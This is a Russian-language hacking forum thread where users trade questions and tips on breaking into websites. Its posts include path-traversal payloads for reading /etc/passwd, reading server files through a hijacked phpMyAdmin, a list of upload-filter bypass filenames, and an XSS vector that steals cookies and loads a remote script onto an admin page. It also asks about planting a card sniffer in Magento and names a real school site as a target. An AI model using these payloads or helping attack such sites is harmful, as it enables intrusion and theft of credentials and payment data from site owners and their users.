Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,070
    Likes Received:
    1,555
    Reputations:
    41
    site,com/download_file.php?path=../../../../../etc/passwd
    site,com/download_file.php?path=file:///etc/passwd
    site,com/download_file.php?path=http://site.ua
    site,com/download_file.php?path= итд
     
    ms13 likes this.
  2. ShpillyWilly

    ShpillyWilly New Member

    Joined:
    27 Sep 2012
    Messages:
    72
    Likes Received:
    3
    Reputations:
    0
    ессно я сразу же это попроовал)
    я к тому, что наверняка же есть какая-то закономерность. Почему именно /65/ ? и почему последнее число всегда не больше 3х...
     
  3. ms13

    ms13 Well-Known Member

    Joined:
    19 Jun 2015
    Messages:
    2,298
    Likes Received:
    10,122
    Reputations:
    115
    Спс, БабаДук!
    Сразу наш0л много чего интересного в практически безнадёжных вариантах!
    Плюсую
    +
     
  4. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,070
    Likes Received:
    1,555
    Reputations:
    41
    Ксорил числа?
    алгоритм такой
     
  5. ShpillyWilly

    ShpillyWilly New Member

    Joined:
    27 Sep 2012
    Messages:
    72
    Likes Received:
    3
    Reputations:
    0
    Товарищи, есть такой вопрос.
    Есть доступ к PMA, file_priv есть, но на мускуле стоит --secure-file-priv, а это значит, что я могу проводить операции с файлами только в рамках дефлтовой мускульной директории. Файлы сервака(psswd, конфиг апача) мне удалось почитать через LOAD DATA LOCAL INFILE, загружая их содержимое в мной созданную таблицу. В итоге у меня есть раскрытые пути, но есть ли вариант залиться куда-нибудь, кроме директории, указанной в --secure-file-priv ? или это без шансов и надо искать другой вектор? Спасибо.
     
  6. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    831
    Likes Received:
    810
    Reputations:
    90
    файлы проекта попробовать почитать, посмотреть как он с данными из бд работает
     
    _________________________
    panic.ker and ShpillyWilly like this.
  7. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
    Metasploit показывает 3 уязвимости + модули к этим уязвимостям, но получить сессию не получается почему ?
     
  8. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
    ХОЗЯИН ТИП ОТКРЫТ ОПИСАНИЕ МОДУЛЬ АТАКИ
    107.154.249.133 - 107.154.249.133.ip.incapdns.net
    Уязвим к exploit/multi/misc/java_rmi_server
    Но не подключится, это как пример на другом сервере 3 уязвимости
     
  9. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    467
    Likes Received:
    82
    Reputations:
    21
    Сама страница получяет такои ответ от сервера
    Code:
    0.72611600+15169956671.php.jpg
    А в итоге картинка на странице выводется так
    Code:
    000/013/927/000013927615.jpg
    Вопрос как все генерируется куда копать?
     
  10. Muracha

    Muracha Member

    Joined:
    30 Jul 2011
    Messages:
    150
    Likes Received:
    10
    Reputations:
    0
    Пробуйте подменить заголовок application-jpg
    Мне помогла статья
    https://habrahabr.ru/post/148999/
     
  11. Muracha

    Muracha Member

    Joined:
    30 Jul 2011
    Messages:
    150
    Likes Received:
    10
    Reputations:
    0
    Нашел " /.svn/entries" в этом файле могут быть захешированные пароли? Нашел только логины и странные обозначения и калаоги:
    Code:
    2015-11-19T15:19:41.000000Z
    345d3c642a73d0f3d463fb1aba2b3e74
    2015-11-19T14:39:32.670226Z
    
    launcher
    dir
    
    auth
    dir
    
    
     
  12. CoolHucker

    CoolHucker New Member

    Joined:
    12 Feb 2013
    Messages:
    21
    Likes Received:
    0
    Reputations:
    0
    Парни подскажите что можно сделать??!
    http://school2.perm.ru/administrator и таких дырок в каждой директории.Попробовал заюзать RFI LFI -безуспешно.
    P.S. Есть мысли ???может кто поможет в этом направлении?
     
  13. xaphan

    xaphan Member

    Joined:
    29 Jan 2018
    Messages:
    6
    Likes Received:
    10
    Reputations:
    4
    Там нет ни LFI, ни RFI. Я объясню почему так.
    В движке этого сайта не предусмотрен mod_rewrite, посему обращение в файлам происходит напрямую с помощью include(); "administrator" - это не файл, посему идёт обращение как в папке. Движок нам говорит, что он обращается к дефолтному index.php (то есть получается движок инклудит так: $_GET["path"]."/index.php"), а его там нет и происходит эта ошибка. Если вместо administrator ввести любое другое значение - реакция будет такая же.

    Данное можно трактовать как обычное раскрытие полного пути.
     
    crlf likes this.
  14. xaphan

    xaphan Member

    Joined:
    29 Jan 2018
    Messages:
    6
    Likes Received:
    10
    Reputations:
    4
    Вряд ли там будут какие-то данные в открытом виде. Это ж система контроля версий (как и гит). Можно попытаться получить все файлы с исходными кодами, вот посоветую этот скрипт.
     
    Muracha and crlf like this.
  15. CoolHucker

    CoolHucker New Member

    Joined:
    12 Feb 2013
    Messages:
    21
    Likes Received:
    0
    Reputations:
    0
    Спасибо за толкование.только неужели нельзя добраться до этого сайта никак?)
     
  16. panic.ker

    panic.ker Member

    Joined:
    25 Aug 2013
    Messages:
    91
    Likes Received:
    68
    Reputations:
    3
    Можно. Только за тебя это делать никто не будет. Это ветка вопросов по уязвимостям, а не по просьбам о взломе. Найди уязвимость, а растолковать и прояснить моменты-мы всегда за.
     
    ms13, auth_root and crlf like this.
  17. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    467
    Likes Received:
    82
    Reputations:
    21
    Посоветуите нормальныи большои список bypass extension для картинок
    Code:
    image.php.jpg
    image.jpg.php
    image.php;.jpg
    image.php%00.jpg
    image.php\0.jpg
    
     
  18. Muracha

    Muracha Member

    Joined:
    30 Jul 2011
    Messages:
    150
    Likes Received:
    10
    Reputations:
    0
    спасибо! помогло!
    А есть ли подобная вещь для WYSIWYG? заточенная на поиск загрузку файлов и тд
    dirb использую, dirbuster тоже но интересует более узкоспециализированное
     
  19. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    2,635
    Likes Received:
    397
    Reputations:
    230
    Magento Version 1.8.1.0
    Кто нить устанавливал снифер на эту версию? нужна помощь, в каком файле данные обрабатываются?
     
  20. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    467
    Likes Received:
    82
    Reputations:
    21
    Есть такои XSS вектор
    Code:
    <img name="alert(document.cookie)" onerror="eval(name)" src="" />
    Хочу сделать скриншот странице админа, нашел все необходимое, но скрипта очень много и засунуть в name="" получится но и за непонятнои фильтрации он никак не заработает, вариант такои засунуть в name="" что то типа инклуда и заинклудить весь .js, какие варианты инклуда есть типо
    Code:
    <img name="include(https:/host/script.js)" onerror="eval(name)" src="" />
    ЕСТЬ В JS ИНКЛУД ЧЕРЕЗ JS?
     
Loading...